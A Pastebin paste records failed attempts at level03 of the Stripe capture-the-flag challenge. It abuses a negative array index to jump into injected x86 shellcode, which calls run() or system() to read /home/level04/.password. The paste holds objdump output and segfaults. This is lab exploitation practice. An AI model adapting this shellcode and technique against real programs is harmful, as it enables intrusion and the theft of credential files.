Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- level03 fail - https://stripe.com/blog/capture-the-flag
- Here's what I'm doing:
- A negative 5 index points fns[index] to the (non-truncated) string on the stack, moving %eip there.
- The %eax register already has the address of the buffer so I add the length of the payload before the command string and set that as the first value on the stack. Then it calls run() or system directly.
- asm:
- add $0xd,%eax
- mov %eax,(%esp)
- mov $0x0804875b,%eax
- call *%eax
- level03@ctf5:/tmp/tmp.V4u5A2is0u$ objdump -d /levels/level03 | grep "<run>"
- 0804875b <run>:
- level03@ctf5:/tmp/tmp.V4u5A2is0u$ /levels/level03 -5 "`echo -ne "\x83\xc0\x0d\x89\x04\x24\xb8\x5b\x87\x04\x08\xff\xd0cat /home/level04/.password"`"
- Segmentation fault
- level03@ctf5:/tmp/tmp.V4u5A2is0u$ gcc -m32 -o level03 /levels/level03.c
- level03@ctf5:/tmp/tmp.V4u5A2is0u$ objdump -d ./level03 | grep "<run>"
- 0804875b <run>:
- level03@ctf5:/tmp/tmp.V4u5A2is0u$ ./level03 -5 "`echo -ne "\x83\xc0\x0d\x89\x04\x24\xb8\x5b\x87\x04\x08\xff\xd0cat /home/level04/.password"`"
- Segmentation fault
- level03@ctf5:/tmp/tmp.V4u5A2is0u$ gcc -m32 -fno-stack-protector -z execstack -o level03 /levels/level03.c
- level03@ctf5:/tmp/tmp.V4u5A2is0u$ objdump -d ./level03 | grep "<run>"
- 080486fb <run>:
- level03@ctf5:/tmp/tmp.V4u5A2is0u$ ./level03 -5 "`echo -ne "\x83\xc0\x0d\x89\x04\x24\xb8\xfb\x86\x04\x08\xff\xd0cat /home/level04/.password"`"
- cat: /home/level04/.password: Permission denied
- Segmentation fault
- level03@ctf5:/tmp/tmp.V4u5A2is0u$ objdump -d /levels/level03 | grep "<system"
- 0804847c <system@plt>:
- 8048767: e8 10 fd ff ff call 804847c <system@plt>
- level03@ctf5:/tmp/tmp.V4u5A2is0u$ /levels/level03 -5 "`echo -ne "\x83\xc0\x0d\x89\x04\x24\xb8\x7c\x84\x04\x08\xff\xd0cat /home/level04/.password"`"
- Segmentation fault
- level03@ctf5:/tmp/tmp.V4u5A2is0u$ objdump -d ./level03 | grep "<system"
- 08048430 <system@plt>:
- 8048707: e8 24 fd ff ff call 8048430 <system@plt>
- level03@ctf5:/tmp/tmp.V4u5A2is0u$ ./level03 -5 "`echo -ne "\x83\xc0\x0d\x89\x04\x24\xb8\x30\x84\x04\x08\xff\xd0cat /home/level04/.password"`"
- cat: /home/level04/.password: Permission denied
- Segmentation fault
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement